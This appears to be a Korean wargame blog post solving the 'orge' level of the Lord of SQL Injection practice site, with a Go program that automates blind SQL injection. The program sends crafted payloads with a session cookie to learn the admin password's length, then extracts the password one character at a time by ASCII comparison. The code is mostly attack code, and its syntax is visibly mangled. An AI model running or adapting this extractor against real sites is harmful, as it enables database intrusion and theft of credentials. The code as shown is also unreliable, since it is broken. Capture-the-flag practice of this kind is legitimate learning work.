https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=
https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec
los.rubiya.kr
package main
import(
"bytes"
"fmt"
"io/ioutil"
"log"
"net/http"
"regexp"
"strconv"
"time"
)
const COOKIEVALUE string = ""
var limit int = 50
var index int = 0
var payload[] string
var pwLength int = 0
func main() {
//requestPost()
getLength(50)
fmt.Println(strconv.Itoa(pwLength))
index = 0
blidSqlInjection(0, 0)
fmt.Println("%v", payload)
}
func matchFind(targetString string) bool {
r,
_: = regexp.Compile("
Hello.*
")
var result[] string
result = r.FindAllString(targetString, -1) if len(result) > 0 {
return true
} else {
return false
}
}
func requestPost() {
url: = "https://los.rubiya.kr/gate.php"
data: = [] byte(`{"hello": "world"}`)
req,
err: = http.NewRequest("POST", url, bytes.NewBuffer(data))
if err != nil {
log.Fatal("Error reading request. ", err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
req.Header.Set("Host", "httpbin.org")
// Create and Add cookie to request
cookie: = http.Cookie {
Name: "PHPSESSID",
Value: COOKIEVALUE
}
req.AddCookie( & cookie)
// Set client timeout
client: = & http.Client {
Timeout: time.Second * 10
}
// Validate cookie and headers are attached
fmt.Println(req.Cookies())
fmt.Println(req.Header)
// Send request
resp,
err: = client.Do(req)
if err != nil {
log.Fatal("Error reading response. ", err)
}
defer resp.Body.Close()
fmt.Println("response Status:", resp.Status)
fmt.Println("response Headers:", resp.Header)
body,
err: = ioutil.ReadAll(resp.Body)
if err != nil {
log.Fatal("Error reading body. ", err)
}
fmt.Printf("%s\n", body)
}
func getLength(start int) int {
//https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20%20ascii(substr(pw,1,1))%3C150%23
if index >= limit || start == 0 {
return -1
}
//url1 := "https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=pw=%27%20or%20%20length(pw)="
url1: = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20length(pw)%3C20"
url2: = strconv.Itoa(start) + "%23%27"
data: = [] byte(`{"hello": "world"}`)
url: = url1 + url2
fmt.Println("Request URL : ", url)
req, err: = http.NewRequest("GET", url, bytes.NewBuffer(data))
if err != nil {
log.Fatal("Error reading request. ", err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
// Create and Add cookie to request
cookie: = http.Cookie {
Name: "PHPSESSID",
Value: COOKIEVALUE
}
req.AddCookie( & cookie)
// Set client timeout
client: = & http.Client {
Timeout: time.Second * 10
}
// Send request
resp, err: = client.Do(req)
if err != nil {
log.Fatal("Error reading response. ", err)
}
defer resp.Body.Close()
//fmt.Println("response Status:", resp.Status)
body, err: = ioutil.ReadAll(resp.Body)
if err != nil {
log.Fatal("Error reading body. ", err)
}
matchResult: = matchFind(string(body))
if matchResult == true {
fmt.Println("Length : ", strconv.Itoa(start))
pwLength = start
return start
}
index++
if matchResult == true {
getLength(start / 2)
} else {
getLength(start - 1)
}
return -1
}
func blidSqlInjection(start int, pwIndex int) int {
//https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=%27%20or%20%20ascii(substr(pw,1,1))%3C150%23
fmt.Println(index, start, pwLength, pwIndex)
if start == pwLength && pwLength == pwIndex {
return -1
}
if pwLength < pwIndex {
return -1
}
url1: = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20||%20id=%27admin%27%20%26%26%20ascii(substr(pw," + strconv.Itoa(pwIndex) + ",1))="
url2: = strconv.Itoa(start) + "%23%27"
data: = [] byte(`{"hello": "world"}`)
url: = url1 + url2
fmt.Println("Request URL : ", url)
req, err: = http.NewRequest("GET", url, bytes.NewBuffer(data))
if err != nil {
log.Fatal("Error reading request. ", err)
}
// Set headers
req.Header.Set("Content-Type", "application/json")
// Create and Add cookie to request
cookie: = http.Cookie {
Name: "PHPSESSID",
Value: COOKIEVALUE
}
req.AddCookie( & cookie)
// Set client timeout
client: = & http.Client {
Timeout: time.Second * 10
}
// Send request
resp, err: = client.Do(req)
if err != nil {
log.Fatal("Error reading response. ", err)
}
defer resp.Body.Close()
//fmt.Println("response Status:", resp.Status)
body, err: = ioutil.ReadAll(resp.Body)
if err != nil {
log.Fatal("Error reading body. ", err)
}
matchResult: = matchFind(string(body))
index++
if matchResult == true {
//fmt.Println("Length : ", strconv.Itoa(start))
//return start
payload = append(payload, string(start))
blidSqlInjection(0, pwIndex + 1)
} else {
blidSqlInjection(start + 1, pwIndex)
}
return -1
}'War Game > LOS' 카테고리의 다른 글
| LOS Cobolt (0) | 2019.06.10 |
|---|---|
| LOS DARK_EYES (0) | 2015.10.24 |
| LOS SUCCUBUS (0) | 2015.10.23 |
| LOS ZOMBIE_ASSASSIN (0) | 2015.10.23 |
| LOS ASSASSIN (0) | 2015.10.23 |